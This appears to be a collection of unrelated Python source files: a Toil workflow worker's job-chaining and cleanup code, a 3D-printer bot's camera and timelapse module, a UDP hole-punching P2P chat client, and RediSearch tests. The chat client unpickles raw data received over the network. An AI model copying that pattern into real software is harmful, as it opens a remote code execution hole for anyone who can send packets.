with job._executor(jobGraph=jobGraph,
stats=statsDict if config.stats else None,
fileStore=fileStore):
with fileStore.open(job):
# Get the next block function and list that will contain any messages
blockFn = fileStore._blockFn
job._runner(jobGraph=jobGraph, jobStore=jobStore, fileStore=fileStore)
# Accumulate messages from this job & any subsequent chained jobs
statsDict.workers.logsToMaster += fileStore.loggingMessages
else:
#The command may be none, in which case
#the jobGraph is either a shell ready to be deleted or has
#been scheduled after a failure to cleanup
logger.debug("No user job to run, so finishing")
break
if FileStore._terminateEvent.isSet():
raise RuntimeError("The termination flag is set")
##########################################
#Establish if we can run another jobGraph within the worker
##########################################
successorJobGraph = nextChainableJobGraph(jobGraph, jobStore)
if successorJobGraph is None or config.disableChaining:
# Can't chain any more jobs.
break
##########################################
#We have a single successor job that is not a checkpoint job.
#We transplant the successor jobGraph command and stack
#into the current jobGraph object so that it can be run
#as if it were a command that were part of the current jobGraph.
#We can then delete the successor jobGraph in the jobStore, as it is
#wholly incorporated into the current jobGraph.
##########################################
# add the successor to the list of jobs run
listOfJobs.append(str(successorJobGraph))
#Clone the jobGraph and its stack
jobGraph = copy.deepcopy(jobGraph)
#Remove the successor jobGraph
jobGraph.stack.pop()
#Transplant the command and stack to the current jobGraph
jobGraph.command = successorJobGraph.command
jobGraph.stack += successorJobGraph.stack
# include some attributes for better identification of chained jobs in
# logging output
jobGraph.unitName = successorJobGraph.unitName
jobGraph.jobName = successorJobGraph.jobName
assert jobGraph.memory >= successorJobGraph.memory
assert jobGraph.cores >= successorJobGraph.cores
#Build a fileStore to update the job
fileStore = FileStore.createFileStore(jobStore, jobGraph, localWorkerTempDir, blockFn,
caching=not config.disableCaching)
#Update blockFn
blockFn = fileStore._blockFn
#Add successorJobGraph to those to be deleted
fileStore.jobsToDelete.add(successorJobGraph.jobStoreID)
#This will update the job once the previous job is done
fileStore._updateJobWhenDone()
#Clone the jobGraph and its stack again, so that updates to it do
#not interfere with this update
jobGraph = copy.deepcopy(jobGraph)
logger.debug("Starting the next job")
##########################################
#Finish up the stats
##########################################
if config.stats:
totalCPUTime, totalMemoryUsage = getTotalCpuTimeAndMemoryUsage()
statsDict.workers.time = str(time.time() - startTime)
statsDict.workers.clock = str(totalCPUTime - startClock)
statsDict.workers.memory = str(totalMemoryUsage)
# log the worker log path here so that if the file is truncated the path can still be found
if redirectOutputToLogFile:
logger.info("Worker log can be found at %s. Set --cleanWorkDir to retain this log", localWorkerTempDir)
logger.info("Finished running the chain of jobs on this node, we ran for a total of %f seconds", time.time() - startTime)
##########################################
#Trapping where worker goes wrong
##########################################
except: #Case that something goes wrong in worker
traceback.print_exc()
logger.error("Exiting the worker because of a failed job on host %s", socket.gethostname())
FileStore._terminateEvent.set()
##########################################
#Wait for the asynchronous chain of writes/updates to finish
##########################################
blockFn()
##########################################
#All the asynchronous worker/update threads must be finished now,
#so safe to test if they completed okay
##########################################
if FileStore._terminateEvent.isSet():
jobGraph = jobStore.load(jobStoreID)
jobGraph.setupJobAfterFailure(config)
workerFailed = True
##########################################
#Cleanup
##########################################
# Close the worker logging
# Flush at the Python level
sys.stdout.flush()
sys.stderr.flush()
if redirectOutputToLogFile:
# Flush at the OS level
os.fsync(1)
os.fsync(2)
# Close redirected stdout and replace with the original standard output.
os.dup2(origStdOut, 1)
# Close redirected stderr and replace with the original standard error.
os.dup2(origStdErr, 2)
# sys.stdout and sys.stderr don't need to be modified at all. We don't
# need to call redirectLoggerStreamHandlers since they still log to
# sys.stderr
# Close our extra handles to the original standard output and standard
# error streams, so we don't leak file handles.
os.close(origStdOut)
os.close(origStdErr)
# Now our file handles are in exactly the state they were in before.
#Copy back the log file to the global dir, if needed
if workerFailed:
jobGraph.logJobStoreFileID = jobStore.getEmptyFileStoreID(jobGraph.jobStoreID)
jobGraph.chainedJobs = listOfJobs
with jobStore.updateFileStream(jobGraph.logJobStoreFileID) as w:
with open(tempWorkerLogPath, "r") as f:
if os.path.getsize(tempWorkerLogPath) > logFileByteReportLimit !=0:
if logFileByteReportLimit > 0:
f.seek(-logFileByteReportLimit, 2) # seek to last tooBig bytes of file
elif logFileByteReportLimit < 0:
f.seek(logFileByteReportLimit, 0) # seek to first tooBig bytes of file
w.write(f.read().encode('utf-8')) # TODO load file using a buffer
jobStore.update(jobGraph)
elif debugging and redirectOutputToLogFile: # write log messages
with open(tempWorkerLogPath, 'r') as logFile:
if os.path.getsize(tempWorkerLogPath) > logFileByteReportLimit != 0:
if logFileByteReportLimit > 0:
logFile.seek(-logFileByteReportLimit, 2) # seek to last tooBig bytes of file
elif logFileByteReportLimit < 0:
logFile.seek(logFileByteReportLimit, 0) # seek to first tooBig bytes of file
logMessages = logFile.read().splitlines()
statsDict.logs.names = listOfJobs
statsDict.logs.messages = logMessages
if (debugging or config.stats or statsDict.workers.logsToMaster) and not workerFailed: # We have stats/logging to report back
jobStore.writeStatsAndLogging(json.dumps(statsDict, ensure_ascii=True))
#Remove the temp dir
cleanUp = config.cleanWorkDir
if cleanUp == 'always' or (cleanUp == 'onSuccess' and not workerFailed) or (cleanUp == 'onError' and workerFailed):
shutil.rmtree(localWorkerTempDir)
#This must happen after the log file is done with, else there is no place to put the log
if (not workerFailed) and jobGraph.command == None and len(jobGraph.stack) == 0 and len(jobGraph.services) == 0:
# We can now safely get rid of the jobGraph
jobStore.delete(jobGraph.jobStoreID)
def main(argv=None):
if argv is None:
argv = sys.argv
# Parse input args
jobName = argv[1]
jobStoreLocator = argv[2]
jobStoreID = argv[3]
##########################################
#Load the jobStore/config file
##########################################
# Try to monkey-patch boto early so that credentials are cached.
try:
import boto
except ImportError:
pass
else:
# boto is installed, monkey patch it now
from toil.lib.ec2Credentials import enable_metadata_credential_caching
enable_metadata_credential_caching()
jobStore = Toil.resumeJobStore(jobStoreLocator)
config = jobStore.config
# Call the worker
workerScript(jobStore, config, jobName, jobStoreID)
|
camera.py
|
import configparser
import logging
import math
import os
import pathlib
import threading
import time
import glob
from contextlib import contextmanager
from functools import wraps
from io import BytesIO
from pathlib import Path
from queue import Queue
from typing import List
import cv2
from PIL import Image, _webp
from telegram import Message
from configuration import ConfigWrapper
from klippy import Klippy
from power_device import PowerDevice
logger = logging.getLogger(__name__)
def cam_light_toggle(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.use_light()
if self.light_timeout > 0 and self.light_device and not self.light_device.device_state and not self.light_lock.locked():
self.light_timer_event.clear()
self.light_lock.acquire()
self.light_need_off = True
self.light_device.switch_device(True)
time.sleep(self.light_timeout)
self.light_timer_event.set()
self.light_timer_event.wait()
# Todo: maybe add try block?
result = func(self, *args, **kwargs)
self.free_light()
def delayed_light_off():
if self.light_requests == 0:
if self.light_lock.locked():
self.light_lock.release()
self.light_need_off = False
self.light_device.switch_device(False)
else:
logger.debug(f"light requests count: {self.light_requests}")
if self.light_need_off and self.light_requests == 0:
threading.Timer(1.5, delayed_light_off).start()
return result
return wrapper
class Camera:
def __init__(self, config: ConfigWrapper, klippy: Klippy, light_device: PowerDevice, logging_handler: logging.Handler = None):
self.enabled: bool = config.camera.enabled
self._host = int(config.camera.host) if str.isdigit(config.camera.host) else config.camera.host
self._threads: int = config.camera.threads
self._flip_vertically: bool = config.camera.flip_vertically
self._flip_horizontally: bool = config.camera.flip_horizontally
self._fourcc: str = config.camera.fourcc
self._video_duration: int = config.camera.video_duration
self._video_buffer_size: int = config.camera.video_buffer_size
self._stream_fps: int = config.camera.stream_fps
self._klippy: Klippy = klippy
# Todo: refactor into timelapse class
self._base_dir: str = config.timelapse.base_dir
self._ready_dir: str = config.timelapse.ready_dir
self._cleanup: bool = config.timelapse.cleanup
self._target_fps: int = 15
self._min_lapse_duration: int = 0
self._max_lapse_duration: int = 0
self._last_frame_duration: int = 5
self._light_need_off: bool = False
self._light_need_off_lock = threading.Lock()
self.light_timeout: int = config.camera.light_timeout
self.light_device: PowerDevice = light_device
self._camera_lock = threading.Lock()
self.light_lock = threading.Lock()
self.light_timer_event = threading.Event()
self.light_timer_event.set()
self._hw_accel: bool = False
if config.camera.picture_quality == 'low':
self._img_extension: str = 'jpeg'
elif config.camera.picture_quality == 'high':
self._img_extension: str = 'webp'
else:
self._img_extension: str = config.camera.picture_quality
self._light_requests: int = 0
self._light_request_lock = threading.Lock()
if self._flip_vertically and self._flip_horizontally:
self._flip = -1
elif self._flip_horizontally:
self._flip = 1
elif self._flip_vertically:
self._flip = 0
if config.camera.rotate == '90_cw':
self._rotate_code: int = cv2.ROTATE_90_CLOCKWISE
elif config.camera.rotate == '90_ccw':
self._rotate_code: int = cv2.ROTATE_90_COUNTERCLOCKWISE
elif config.camera.rotate == '180':
self._rotate_code: int = cv2.ROTATE_180
else:
self._rotate_code: int = -10
if logging_handler:
logger.addHandler(logging_handler)
if config.bot.debug:
logger.setLevel(logging.DEBUG)
logger.debug(cv2.getBuildInformation())
os.environ["OPENCV_VIDEOIO_DEBUG"] = "1"
# Fixme: deprecated! use T-API https://learnopencv.com/opencv-transparent-api/
if cv2.ocl.haveOpenCL():
logger.debug('OpenCL is available')
cv2.ocl.setUseOpenCL(True)
logger.debug(f'OpenCL in OpenCV is enabled: {cv2.ocl.useOpenCL()}')
cv2.setNumThreads(self._threads)
self.cam_cam = cv2.VideoCapture()
self.cam_cam.set(cv2.CAP_PROP_BUFFERSIZE, 1)
@property
def light_need_off(self) -> bool:
with self._light_need_off_lock:
return self._light_need_off
@light_need_off.setter
def light_need_off(self, new_value: bool):
with self._light_need_off_lock:
self._light_need_off = new_value
@property
def lapse_dir(self) -> str:
return f'{self._base_dir}/{self._klippy.printing_filename_with_time}'
@property
def light_requests(self) -> int:
with self._light_request_lock:
return self._light_requests
def use_light(self):
with self._light_request_lock:
self._light_requests += 1
def free_light(self):
with self._light_request_lock:
self._light_requests -= 1
@property
def target_fps(self) -> int:
return self._target_fps
@target_fps.setter
def target_fps(self, new_value: int):
self._target_fps = new_value
@property
def min_lapse_duration(self) -> int:
return self._min_lapse_duration
@min_lapse_duration.setter
def min_lapse_duration(self, new_value: int):
if new_value >= 0:
self._min_lapse_duration = new_value
@property
def max_lapse_duration(self) -> int:
return self._max_lapse_duration
@max_lapse_duration.setter
def max_lapse_duration(self, new_value: int):
if new_value >= 0:
self._max_lapse_duration = new_value
@property
def last_frame_duration(self) -> int:
return self._last_frame_duration
@last_frame_duration.setter
def last_frame_duration(self, new_value: int):
if new_value >= 0:
self._last_frame_duration = new_value
@staticmethod
def _create_thumb(image) -> BytesIO:
# cv2.cvtColor cause segfaults!
img = Image.fromarray(image[:, :, [2, 1, 0]])
bio = BytesIO()
bio.name = 'thumbnail.jpeg'
img.thumbnail((320, 320))
img.save(bio, 'JPEG', quality=100, optimize=True)
bio.seek(0)
img.close()
del img
return bio
@cam_light_toggle
def take_photo(self) -> BytesIO:
with self._camera_lock:
self.cam_cam.open(self._host)
self.cam_cam.set(cv2.CAP_PROP_BUFFERSIZE, 1)
success, image = self.cam_cam.read()
self.cam_cam.release()
if not success:
logger.debug("failed to get camera frame for photo")
# Todo: resize to cam resolution!
img = Image.open('../imgs/nosignal.png')
else:
if self._hw_accel:
image_um = cv2.UMat(image)
if self._flip_vertically or self._flip_horizontally:
image_um = cv2.flip(image_um, self._flip)
img = Image.fromarray(cv2.UMat.get(cv2.cvtColor(image_um, cv2.COLOR_BGR2RGB)))
image_um = None
del image_um
else:
if self._flip_vertically or self._flip_horizontally:
image = cv2.flip(image, self._flip)
# Todo: check memory leaks
if self._rotate_code > -10:
image = cv2.rotate(image, rotateCode=self._rotate_code)
# # cv2.cvtColor cause segfaults!
# rgb = image[:, :, ::-1]
rgb = image[:, :, [2, 1, 0]]
img = Image.fromarray(rgb)
rgb = None
del rgb
image = None
del image, success
bio = BytesIO()
bio.name = f'status.{self._img_extension}'
if self._img_extension in ['jpg', 'jpeg']:
img.save(bio, 'JPEG', quality=80, subsampling=0)
elif self._img_extension == 'webp':
# https://github.com/python-pillow/Pillow/issues/4364
_webp.HAVE_WEBPANIM = False
img.save(bio, 'WebP', quality=0, lossless=True)
elif self._img_extension == 'png':
img.save(bio, 'PNG')
bio.seek(0)
img.close()
del img
return bio
@contextmanager
def take_video_generator(self):
(video_bio, thumb_bio, width, height) = self.take_video()
try:
yield video_bio, thumb_bio, width, height
finally:
video_bio.close()
thumb_bio.close()
@cam_light_toggle
def take_video(self) -> (BytesIO, BytesIO, int, int):
def process_video_frame(frame_local):
if self._flip_vertically or self._flip_horizontally:
if self._hw_accel:
frame_loc_ = cv2.UMat(frame_local)
frame_loc_ = cv2.flip(frame_loc_, self._flip)
frame_local = cv2.UMat.get(frame_loc_)
del frame_loc_
else:
frame_local = cv2.flip(frame_local, self._flip)
# Todo: check memory leaks
if self._rotate_code > -10:
frame_local = cv2.rotate(frame_local, rotateCode=self._rotate_code)
return frame_local
def write_video():
cv2.setNumThreads(self._threads)
out = cv2.VideoWriter(filepath, fourcc=cv2.VideoWriter_fourcc(*self._fourcc), fps=fps_cam, frameSize=(width, height))
while video_lock.locked():
try:
frame_local = frame_queue.get(block=False)
except Exception as ex:
logger.warning(f'Reading video frames queue exception {ex.with_traceback}')
frame_local = frame_queue.get()
out.write(process_video_frame(frame_local))
# frame_local = None
# del frame_local
while not frame_queue.empty():
frame_local = frame_queue.get()
out.write(process_video_frame(frame_local))
# frame_local = None
# del frame_local
out.release()
video_written_event.set()
with self._camera_lock:
cv2.setNumThreads(self._threads) # TOdo: check self set and remove!
self.cam_cam.open(self._host)
self.cam_cam.set(cv2.CAP_PROP_BUFFERSIZE, 1)
success, frame = self.cam_cam.read()
if not success:
logger.debug("failed to get camera frame for video")
# Todo: get picture from imgs?
frame = process_video_frame(frame)
height, width, channels = frame.shape
thumb_bio = self._create_thumb(frame)
del frame, channels
fps_cam = self.cam_cam.get(cv2.CAP_PROP_FPS) if self._stream_fps == 0 else self._stream_fps
filepath = os.path.join('/tmp/', 'video.mp4')
frame_queue = Queue(fps_cam * self._video_buffer_size)
video_lock = threading.Lock()
video_written_event = threading.Event()
video_written_event.clear()
video_lock.acquire()
threading.Thread(target=write_video, args=()).start()
t_end = time.time() + self._video_duration
while success and time.time() <= t_end:
success, frame_loc = self.cam_cam.read()
try:
frame_queue.put(frame_loc, block=False)
except Exception as ex:
logger.warning(f'Writing video frames queue exception {ex.with_traceback}')
frame_queue.put(frame_loc)
# frame_loc = None
# del frame_loc
video_lock.release()
video_written_event.wait()
self.cam_cam.release()
video_bio = BytesIO()
video_bio.name = 'video.mp4'
with open(filepath, 'rb') as fh:
video_bio.write(fh.read())
os.remove(filepath)
video_bio.seek(0)
return video_bio, thumb_bio, width, height
def take_lapse_photo(self) -> None:
# Todo: check for space available?
Path(self.lapse_dir).mkdir(parents=True, exist_ok=True)
# never add self in params there!
with self.take_photo() as photo:
filename = f'{self.lapse_dir}/{time.time()}.{self._img_extension}'
with open(filename, "wb") as outfile:
outfile.write(photo.getvalue())
photo.close()
def create_timelapse(self, printing_filename: str, gcode_name: str, info_mess: Message) -> (BytesIO, BytesIO, int, int, str, str):
return self._create_timelapse(printing_filename, gcode_name, info_mess)
def create_timelapse_for_file(self, filename: str, info_mess: Message) -> (BytesIO, BytesIO, int, int, str, str):
return self._create_timelapse(filename, filename, info_mess)
def _calculate_fps(self, frames_count: int) -> int:
actual_duration = frames_count / self._target_fps
# Todo: check _max_lapse_duration > _min_lapse_duration
if (self._min_lapse_duration == 0 and self._max_lapse_duration == 0) or (self._min_lapse_duration <= actual_duration <= self._max_lapse_duration and self._max_lapse_duration > 0):
return self._target_fps
elif actual_duration < self._min_lapse_duration and self._min_lapse_duration > 0:
fps = math.ceil(frames_count / self._min_lapse_duration)
return fps if fps >= 1 else 1
elif actual_duration > self._max_lapse_duration > 0:
return math.ceil(frames_count / self._max_lapse_duration)
def _create_timelapse(self, printing_filename: str, gcode_name: str, info_mess: Message) -> (BytesIO, BytesIO, int, int, str, str):
while self.light_need_off:
time.sleep(1)
lapse_dir = f'{self._base_dir}/{printing_filename}'
if not Path(f'{lapse_dir}/lapse.lock').is_file():
open(f'{lapse_dir}/lapse.lock', mode='a').close()
# Todo: check for nonempty photos!
photos = glob.glob(f'{glob.escape(lapse_dir)}/*.{self._img_extension}')
photos.sort(key=os.path.getmtime)
photo_count = len(photos)
info_mess.edit_text(text=f"Creating thumbnail")
last_photo = photos[-1]
img = cv2.imread(last_photo)
height, width, layers = img.shape
thumb_bio = self._create_thumb(img)
video_filepath = f'{lapse_dir}/{printing_filename}.mp4'
if Path(video_filepath).is_file():
os.remove(video_filepath)
lapse_fps = self._calculate_fps(photo_count)
with self._camera_lock:
cv2.setNumThreads(self._threads) # TOdo: check self set and remove!
out = cv2.VideoWriter(video_filepath, fourcc=cv2.VideoWriter_fourcc(*self._fourcc), fps=lapse_fps, frameSize=(width, height))
info_mess.edit_text(text=f"Images recoding")
last_update_time = time.time()
for fnum, filename in enumerate(photos):
if time.time() >= last_update_time + 3:
info_mess.edit_text(text=f"Images recoded {fnum}/{photo_count}")
last_update_time = time.time()
out.write(cv2.imread(filename))
info_mess.edit_text(text=f"Repeating last image for {self._last_frame_duration} seconds")
for _ in range(lapse_fps * self._last_frame_duration):
out.write(img)
out.release()
cv2.destroyAllWindows()
del out
del photos, img, layers
# Todo: some error handling?
video_bio = BytesIO()
video_bio.name = f'{printing_filename}.mp4'
with open(video_filepath, 'rb') as fh:
video_bio.write(fh.read())
if self._ready_dir and os.path.isdir(self._ready_dir):
info_mess.edit_text(text=f"Copy lapse to target ditectory")
with open(f"{self._ready_dir}/{printing_filename}.mp4", 'wb') as cpf:
cpf.write(video_bio.getvalue())
video_bio.seek(0)
os.remove(f'{lapse_dir}/lapse.lock')
if self._cleanup:
info_mess.edit_text(text=f"Performing cleanups")
for filename in glob.glob(f'{glob.escape(lapse_dir)}/*.{self._img_extension}'):
os.remove(filename)
if video_bio.getbuffer().nbytes < 52428800:
for filename in glob.glob(f'{glob.escape(lapse_dir)}/*'):
os.remove(filename)
Path(lapse_dir).rmdir()
return video_bio, thumb_bio, width, height, video_filepath, gcode_name
def clean(self) -> None:
if self._cleanup and self._klippy.printing_filename and os.path.isdir(self.lapse_dir):
for filename in glob.glob(f'{glob.escape(self.lapse_dir)}/*'):
os.remove(filename)
# Todo: refactor into timelapse class
# Todo: check for 64 symbols length in lapse names
def detect_unfinished_lapses(self) -> List[str]:
# Todo: detect unstarted timelapse builds? folder with pics and no mp4 files
return list(map(lambda el: pathlib.PurePath(el).parent.name, glob.glob(f'{self._base_dir}/*/*.lock')))
|
client.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import pickle
import socket
import sys
import time
from threading import Event, Thread
from typing import Tuple, List
from psy import network
from psy.client.message import Message
from psy.client.config import bus
from psy.client.config import logging
class Client:
master: Tuple[str, int]
pool: str
periodic_running: str
peer_nat_type: str
messages: List[Message]
def __init__(self, master_ip: str, port: int, pool: str, messages: List) -> None:
self.master = (master_ip, port)
self.pool = pool.strip()
self.sockfd = self.target = None
self.periodic_running = False
self.peer_nat_type = None
self.messages = messages
def request_for_connection(self, nat_type_id=0):
self.sockfd: socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sockfd.sendto(bytes(self.pool + ' {0}'.format(nat_type_id), 'utf-8'), self.master)
data, addr = self.sockfd.recvfrom(len(self.pool) + 3)
data = data.decode('utf-8')
if data != "ok " + self.pool:
logging.warn("unable to request!")
sys.exit(1)
self.sockfd.sendto(bytes("ok", 'utf-8'), self.master)
logging.info("request sent, waiting for partner in pool '%s'..." % self.pool)
data, addr = self.sockfd.recvfrom(8)
self.target, peer_nat_type_id = network.bytes2address(data)
logging.info(str(self.target) + " " + str(peer_nat_type_id))
self.peer_nat_type = network.NATTYPE[peer_nat_type_id]
logging.info("connected to {1}:{2}, its NAT type is {0}".format(self.peer_nat_type, *self.target))
def recv_msg(self, sock, is_restrict=False, event=None):
if is_restrict:
while True:
data, addr = sock.recvfrom(1024)
if self.periodic_running:
logging.info("periodic_send is alive")
self.periodic_running = False
event.set()
logging.info("received msg from target,", "periodic send cancelled, chat start.")
if addr == self.target or addr == self.master:
message = pickle.loads(data)
self.messages.append(message)
bus.emit('client:messages:received', message)
if data == "punching...\n":
sock.sendto("end punching\n", addr)
else:
while True:
data, addr = sock.recvfrom(1024)
if addr == self.target or addr == self.master:
message = pickle.loads(data)
self.messages.append(message)
bus.emit('client:messages:received', message)
if data == "punching...\n": # peer是restrict
sock.sendto("end punching", addr)
def send_msg(self, sock):
while True:
if len(self.messages) > 0:
messages = self.get_messages_to_send()
if len(messages):
for message in messages:
message.was_sent = True
bus.emit('client:messages:sent', message)
sock.sendto(pickle.dumps(message), self.target)
def get_messages_to_send(self):
to_send: List = []
for message in self.messages:
if not message.was_sent:
to_send.append(message)
return to_send
@staticmethod
def start_working_threads(send, recv, event=None, *args, **kwargs):
ts = Thread(target=send, args=args, kwargs=kwargs)
ts.setDaemon(True)
ts.start()
if event:
event.wait()
tr = Thread(target=recv, args=args, kwargs=kwargs)
tr.setDaemon(True)
tr.start()
def chat_fullcone(self):
self.start_working_threads(self.send_msg, self.recv_msg, None, self.sockfd)
def chat_restrict(self):
from threading import Timer
cancel_event = Event()
def send(count):
self.sockfd.sendto(bytes('punching...\n', 'utf-8'), self.target)
logging.info("UDP punching package {0} sent".format(count))
if self.periodic_running:
Timer(0.5, send, args=(count + 1,)).start()
self.periodic_running = True
send(0)
kwargs = {'is_restrict': True, 'event': cancel_event}
self.start_working_threads(self.send_msg, self.recv_msg, cancel_event,
self.sockfd, **kwargs)
def chat_symmetric(self):
"""
Completely rely on relay server(TURN)
"""
def send_msg_symm(sock):
# todo switch to message list
while True:
data = 'msg ' + sys.stdin.readline()
sock.sendto(bytes(data, 'utf-8'), self.master)
def recv_msg_symm(sock):
while True:
data, addr = sock.recvfrom(1024)
if addr == self.master:
self.messages.append(data.decode('utf-8'))
self.start_working_threads(send_msg_symm, recv_msg_symm, None,
self.sockfd)
def main(self, test_nat_type=None):
"""
nat_type是自己的nat类型
peer_nat_type是从服务器获取的对方的nat类型
选择哪种chat模式是根据nat_type来选择, 例如我这边的NAT设备是restrict, 那么我必须得一直向对方发包,
我的NAT设备才能识别对方为"我已经发过包的地址". 直到收到对方的包, periodic发送停止
"""
if not test_nat_type:
nat_type, _, _ = network.get_nat_type()
else:
nat_type = test_nat_type # 假装正在测试某种类型的NAT
try:
self.request_for_connection(nat_type_id=network.NATTYPE.index(nat_type))
except ValueError:
logging.error("NAT type is %s" % nat_type)
self.request_for_connection(nat_type_id=4) # Unknown NAT
if nat_type == network.UnknownNAT or self.peer_nat_type == network.UnknownNAT:
logging.info("Symmetric chat mode")
self.chat_symmetric()
if nat_type == network.SymmetricNAT or self.peer_nat_type == network.SymmetricNAT:
logging.info("Symmetric chat mode")
self.chat_symmetric()
elif nat_type == network.FullCone:
logging.info("FullCone chat mode")
self.chat_fullcone()
elif nat_type in (network.RestrictNAT, network.RestrictPortNAT):
logging.info("Restrict chat mode")
self.chat_restrict()
else:
logging.error("NAT type wrong!")
while True:
try:
time.sleep(0.5)
except KeyboardInterrupt:
logging.info("exit")
sys.exit(0)
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
